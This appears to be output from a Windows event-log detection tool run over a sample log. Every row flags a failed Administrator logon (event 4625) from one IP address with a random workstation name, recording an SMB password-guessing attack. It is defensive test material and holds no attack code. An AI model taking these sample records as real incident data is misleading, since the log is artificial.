2016-09-20 01:51:32.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YlbxRctdClWIOjss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.886 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LToi5ANf3tUteu4h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.932 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 52YPmYviVPBqJ39Y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:32.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JpzKsyxEKNLd8l1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0vd6xEFevamX3jF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.089 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WR9gJBoN1ra4NI2M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rGYNVrDBIpMBu9GT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 57qCysbeaXx12CbY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.229 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xyJl4mHvgtTv53d9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.275 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jGBDZCtot2ogcKIO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bBhmbqZIi1gX62mM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o7d4bcBJV1jlRgdt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FtfFb6hMHJiFXxai : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.441 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: frlsZMDcdb5WaW99 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CFV8UiUTRCCfab9l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZI8P6ZeVRmQlbGtz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.572 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UmJI7S1nj5hfWZqv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: veh8XInSzXe8E9UD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a1BuBHLILZ4afwJC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NN2h7CHnGSCQZXan : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.758 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BU3fxfM1qGBJ55HS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.802 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q1OlBmhUABabDQbN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.848 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6DgQtHG7cT05kRXd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.890 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EUTe3JqVWgDcDcOS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nGKgUOyX3USQlESB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:33.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rcIJ8keQvgax1SuL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A7jsyA7bWtVf4sLr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mijnM28fwbgWzkvp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.115 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o6dNmJo7vkacqxA6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FxvD2OWtadDT1Q2c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WK8Esc50KVWIsLU5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.244 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: U07NeCzXSdx5Nlgs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tObVl72GJse2HCGp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.335 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nbEnp2E5a3N78OBC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.389 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IlRmyinJLWwj5yQg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.438 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 92H7tdXinUOxtOLV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Za42EUNuitIXaMBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kz7OtswOreS0fdeS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VMxY1IHx5VuvskM7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.667 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d6uxMqLCcqHkuesV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.721 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TmeAWYvFEbqJp1rt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.826 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8tGAdT1CBRYRatVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:34.925 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: K0h9ulMPWtj8bEKI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.052 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eLyLMNv6cOp3sgrq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KIAOs16X8nFxV45x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z4EbyEaUxUEyuiY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDnW5GABBLbe6eZ7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.258 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GublgQLD3RXQNmkX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2BQRppHTUHAoWPe4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gnh6HFlIW1zWEBu5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.402 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ulbcy5PWLYUm5Sy0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: L8rkZ7iBMam5o8VJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n39Zox0PFeNirzyT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3u3YUCKxEo5pnKJX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wen3pHM88kSRkHNf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGDHJ4KMm2zEMV0b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKZAB1nfXPYSLxsE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tYkOsX0XDpkdvp01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9y7HjOeGPcrdj1c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLwh8Lg3nvbm8Q2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoMkBcp8ouIgpX4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2UnrDiOAOec5DQGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UxJGLShj5EDKLSDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iWhaz8W0VLQdXKWN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 82YDxSIBnCAqdK4c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 795b7XqsxokIGJyM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1BmnyTsmP2XqMzf1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB3xsYe3RcPXhDib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxN9i8exdO2h4oa7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjcQaeuo4f8wFXhv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zCzr77BhliB4KKeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z558005RepKaO1zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HFzW25mJz4JLkv7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y7J8m97GQWt2cbSs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJrVwcpABBaZ8cyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
